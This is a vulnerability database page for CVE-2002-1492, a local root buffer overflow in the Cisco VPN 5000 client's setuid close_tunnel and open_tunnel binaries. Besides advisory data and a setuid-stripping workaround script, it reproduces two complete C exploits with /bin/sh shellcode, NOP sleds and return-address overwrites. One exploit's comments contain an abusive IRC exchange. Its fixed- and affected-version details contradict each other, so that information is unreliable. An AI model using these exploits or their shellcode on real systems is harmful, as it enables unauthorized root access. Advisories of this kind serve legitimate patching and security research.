CVE-2002-1492
CVSS 7.2
Published: 2003-04-02 00:00:00
Revised: 2008-09-05 16:30:44

[Original text] Buffer overflows in the Cisco VPN 5000 Client before 5.2.7 for Linux, and VPN 5000 Client before 5.2.8 for Solaris, allow local users to gain root privileges via (1) close_tunnel and (2) open_tunnel.


[CNNVD] Cisco VPN Client Local Buffer Overflow Vulnerability (CNNVD-200304-004)

        
        The Cisco Virtual Private Network (VPN) Client is a program for communicating securely over the Internet with enterprise Cisco VPN devices. It runs on Microsoft Windows and also on Linux.
        The 'close_tunnel' and 'open_tunnel' programs of the Cisco VPN 5000 Client contain buffer overflows; a local attacker who exploits them may execute arbitrary instructions on the system with root privileges.
        The Cisco VPN Client ships the 'close_tunnel' and 'open_tunnel' programs installed setuid root by default, so a malicious local user can use these flaws to escalate to root privileges.
        Cisco's bug ID for this issue: CSCdy20065
        <*Link: http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml
        *>

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [can bring the system down completely]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/a:cisco:vpn_5000_client:5.2.6::linux
cpe:/a:cisco:vpn_5000_client:5.2.7::solaris

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1492
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1492
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-004
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5734
(VENDOR_ADVISORY)  BID  5734
http://www.iss.net/security_center/static/10131.php
(VENDOR_ADVISORY)  XF  cisco-vpn5000-binary-bo(10131)
http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml
(VENDOR_ADVISORY)  CISCO  20020918 Cisco VPN 5000 Client Multiple Vulnerabilities

- Vulnerability information

Cisco VPN Client Local Buffer Overflow Vulnerability
High severity  Boundary condition error
2003-04-02 00:00:00 2005-10-20 00:00:00
Local
        

- Advisories and patches

        Interim workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
        * Temporarily remove the SETUID ROOT bit from the 'close_tunnel' and 'open_tunnel' programs.
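An added example (not part of the CNNVD record or any Cisco tooling): a POSIX shell helper that carries out the interim workaround above by locating setuid copies of close_tunnel and open_tunnel under caller-supplied directories, stripping the setuid bit and confirming it is gone. The directories to scan are an assumption; the client's install location varies between systems.

```shell
#!/bin/sh
# Added example (not from the CNNVD record or Cisco): implement the interim
# workaround by finding setuid copies of the two helpers and stripping the bit.
# The directories to scan are passed by the caller; locations such as /bin or
# /usr/local/bin are only assumptions, as the exploit comments themselves note.

TUNNEL_BINS="close_tunnel open_tunnel"

# find_setuid_tunnel_bins DIR... : print the path of every regular file named
# close_tunnel or open_tunnel below DIR that has the setuid bit (mode 4000) set.
find_setuid_tunnel_bins() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for name in $TUNNEL_BINS; do
            find "$dir" -type f -name "$name" -perm -4000 2>/dev/null
        done
    done
}

# count_setuid_tunnel_bins DIR... : number of files the search above reports.
count_setuid_tunnel_bins() {
    find_setuid_tunnel_bins "$@" | wc -l | tr -d ' '
}

# report_setuid_tunnel_bins DIR... : show owner and mode so root-owned copies
# (the dangerous case described in the record) stand out in the output.
report_setuid_tunnel_bins() {
    find_setuid_tunnel_bins "$@" | while IFS= read -r f; do
        ls -ld "$f"
    done
}

# strip_setuid FILE : remove the setuid bit and verify it is really gone.
# Returns 0 on success, 1 if chmod failed or the bit is still set.
strip_setuid() {
    chmod u-s "$1" && ! [ -u "$1" ]
}

# apply_workaround DIR... : strip the bit from every match; returns the number
# of files that could not be fixed (0 means the workaround is fully in place).
apply_workaround() {
    failed=0
    for f in $(find_setuid_tunnel_bins "$@"); do
        strip_setuid "$f" || failed=$((failed + 1))
    done
    return "$failed"
}
```

Run `report_setuid_tunnel_bins /bin /usr/local/bin` first to see what would be changed, then `apply_workaround` with the same directories; a zero exit status means no setuid copy remains.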
        Vendor patch:
        Cisco
        -----
        Cisco has released a security advisory (Cisco-vpn5k-client) and corresponding patches:
        Cisco-vpn5k-client: Cisco VPN 5000 Client Multiple Vulnerabilities
        Link:
        http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml

        This vulnerability has been fixed in Cisco VPN 5000 client release 5.2.4 (and later) and Solaris VPN 5000 Client release 5.2.8 (and later).
        For details on how to upgrade to the fixed software, see:
        
        http://www.cisco.com/univercd/cc/td/doc/product/aggr/vpn5000/client/

        Contract customers can obtain upgraded software through their normal update channels. For most customers, upgrades are available from the Software Center on the Cisco website:
        
        http://www.cisco.com/public/sw-center/

        Customers with a prior or existing agreement with a third-party support organization, such as a Cisco partner, authorized reseller or service provider, under which that third party supports their Cisco products, may obtain the upgrade from that organization free of charge.
        Customers who purchased directly from Cisco but do not hold a Cisco service contract, and customers who purchased through a third-party vendor but cannot obtain the fixed software from their point of sale, can obtain the upgrade from the Cisco Technical Assistance Center (TAC). TAC contacts:
         * +1 800 553 2447 (toll free from within North America)
         * +1 408 526 7209 (toll call from anywhere in the world)
         * e-mail: tac@cisco.com

- Vulnerability information (21805)

Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (1) (EDBID:21805)
unix local
2002-09-18 Verified
0 BrainStorm
N/A
source: http://www.securityfocus.com/bid/5734/info

Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.

/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax            0xffffffff       -1
* ecx            0x0      0
* edx            0x0      0
* ebx            0x4015c154       1075167572
* esp            0xbfffdb70       0xbfffdb70
* ebp            0x41414141       0x41414141
* esi            0x400168e4       1073834212
* edi            0xbfffdbf4       -1073751052
* eip            0x41414141       0x41414141
* eflags         0x10286  66182
*
* as you can see %eip got filled with 0x41 ;)
*
* tested:
*         - on release 5.1.5
*         - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
*         - system RedHat Linux 7.2 / x86
*
* Bug Information:
*  There are multiple unchecked buffers in the code which allow
*  arbitrary code to be executed with root privileges.
*  this is due to insufficient bounds checking.
*  the result is a classic command line buffer overflow condition.
*  This should be exploitable on Linux/Solaris.
*
* IRC:
*  <BrainStor> a standard cmd line buffer overflow in the -d option
*  <BrainStor> close_tunnel is set +s by default
*  <v0id> tsk tsk tsk, cisco making errors like that
*  <v0id> fucking stupid cunts
*  <BrainStor> yea
*  <BrainStor> its unbelievable
*  <v0id> man, standard buffer overflow should be practically non existant these days
*  <v0id> oh well
*  <BrainStor> indeed
*  <BrainStor> but its good tho ;)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define B       2504
#define N       0x90
#define R       0xbfffefc0              // may need to be changed depending on the distro/os..
#define BIN     "/bin/close_tunnel"     // you maybe want to change this too =P
                                        // /usr/local/bin/close_tunnel or so..
char shell[] = "HELO"                   // yes this is a valid x86 instruction ;)
               "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"                         // setuid();
               "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
               "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
               "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";


int main(int argc, char **argv)
{
  long ret;                 // written in 4-byte steps below: the code assumes a 32-bit x86 target
  int off, es;

  char bof[B];

    printf("\n\n");
    printf("       [ElectronicSouls]       \n");
    printf(" Cisco VPN 5000 client exploit \n");
    printf("        (C) BrainStorm       \n\n");

    if (argc < 2) {
       off = 0;
       ret = R; }

    else if (argc < 3) {
       fprintf(stderr, "usage: %s [offset retaddr]\n", argv[0]);
       return 1; }

    else {
       off = atoi(argv[1]);
       ret = atoi(argv[2]) + off; }

    // fill the whole buffer with the return address
    for (es = 0; es < B; es += 4 )
       *(long *) &bof[es] = ret;

    printf("+ return address: 0x%lx \n", ret);

    // NOP sled, then the shellcode; the final 36 bytes keep the return addresses
    for (es = 0; es < (B - strlen(shell) - 36); ++es)
       *(bof+es) = N;

    memcpy(bof+es, shell, strlen(shell));

    printf("+ overflowing the buffer..\n\n\n");

    execl(BIN, BIN, "-d", bof, (char *)NULL);       // b00m!

  return(0);
}

		

- Vulnerability information (21806)

Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (2) (EDBID:21806)
unix local
2002-09-18 Verified
0 zillion
N/A
source: http://www.securityfocus.com/bid/5734/info
 
Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.

/*
 * Cisco VPN 5000 Linux client version 5.1.5 local root exploit 
 *
 * By zillion[at]safemode.org 09/2002 
 * 
 * Greets to the 0dd people ;p
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define BUFFER_SIZE 2504
#define NOP 0x90
#define RET 0xbffff0e0

char shellcode[]=

        /* setresuid(0,0,0) &&  execve("/bin/sh",["/bin/sh"],0); */
        "\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80"
        "\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";

void print_error(char *burb) {
        printf(" Error: %s !\n", burb); exit(0);
}

void usage(char *progname) {
        printf("\nDefault: %s  -f /path/to/close_tunnel", progname);
        printf("\nOption : %s  -o <offset>\n\n", progname);
        exit(0);
}

int main(int argc, char **argv){

char buffer[BUFFER_SIZE];
char file[30] = "";            /* path of the setuid binary, given with -f */
long retaddress;               /* 4-byte writes below assume a 32-bit x86 target */
int arg, offset = 600;

struct stat sbuf;

if(argc < 2) { usage(argv[0]); }

while ((arg = getopt (argc, argv, "f:o:")) != -1){
      switch (arg){
      case 'f':
        strncpy(file, optarg, sizeof(file) - 1);   /* leave room for the terminator */
        file[sizeof(file) - 1] = '\0';
        if(stat(file, &sbuf)) { print_error("No such file");}
        break;
      case 'o':
        offset = atoi(optarg);
        if(offset < 0) { print_error("Offset must be positive");}
        break;
      default :
        usage(argv[0]);
     }
}

if(file[0] == '\0') { usage(argv[0]); }   /* -f is required */

retaddress = (RET - offset);
memset(buffer, NOP, BUFFER_SIZE);
memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8), shellcode, sizeof(shellcode) - 1);

/* Overwrite EBP and EIP */
*(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
*(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;

if(execl(file, file, "-d", buffer, (char *)NULL) != 0) {
        print_error("Could not execute file");
}

return 0;

}


		

- Vulnerability information

8878
Cisco VPN 5000 Client Multiple Function Overflows
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-09-18 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Cisco VPN 5000 Client Buffer Overrun Vulnerabilities
Boundary Condition Error 5734
No Yes
2002-09-18 12:00:00 2009-07-11 05:06:00
Discovered by Niels Heinen <niels.heinen@ubizen.com>.

- Affected program versions

Cisco VPN 5000 Client for Solaris 5.2.7
Cisco VPN 5000 Client for Linux 5.2.6
Cisco VPN 5000 Client for Solaris 5.2.8
Cisco VPN 5000 Client for Linux 5.2.7

- Unaffected program versions

Cisco VPN 5000 Client for Solaris 5.2.8
Cisco VPN 5000 Client for Linux 5.2.7

- Vulnerability discussion

Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.

- Exploit

Exploit code has been published for version 5.1.5 on Linux systems:

- Solution

Cisco has released patched upgrades:

Cisco VPN 5000 Client for Linux 5.2.6
  • Cisco VPN 5000 Client for Linux 5.2.7

Cisco VPN 5000 Client for Solaris 5.2.7
  • Cisco VPN 5000 Client for Solaris 5.2.8

- References


About the SCAP Chinese Community

SCAP中文社区 is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.